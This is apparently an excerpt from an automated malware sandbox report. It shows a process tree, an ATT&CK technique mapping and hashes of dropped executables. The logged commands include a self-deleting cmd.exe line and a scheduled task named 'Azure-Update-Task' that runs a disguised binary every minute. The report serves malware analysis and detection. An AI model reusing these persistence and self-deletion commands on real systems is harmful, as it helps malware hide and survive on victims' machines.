                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\AUDIODG.EXE 0x3e4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\werfault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              werfault.exe /h /shared Global\5c11f00dc47c4ef4a33a6a42217482b9 /t 5052 /p 7480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\650D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\650D.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\650D.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\fgYoUKj95C.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\fgYoUKj95C.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\EEK\Start Emergency Kit Scanner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\EEK\Start Emergency Kit Scanner.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\EEK\bin64\a2emergencykit.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\EEK\bin64\a2emergencykit.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "LogonUI.exe" /flags:0x0 /state0:0xa3a6a055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7236
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "LogonUI.exe" /flags:0x0 /state0:0xa3a6d055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8104

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      File Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1222

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1518

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Exfiltration

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Impact

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1daac0c9a48a79976539b0722f9c3d3b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        843218f70a6a7fd676121e447b5b74acb0d87100

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        e496ce805aa5b3ed8e1898803a536c683d031c5a61b2a54e5c89e02c4febecdf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2259e6e27e6ca6155b50bc0dfd8c3f9f1a31db53c8b4d1811e94e927e30aba2ded4c92a34dfee042d96bd5fd7cbfdbb73d168cc8d66f9b3a37df40980d6dfebc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Submit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3c7117f96c0c2879798a78a32d5d34cc

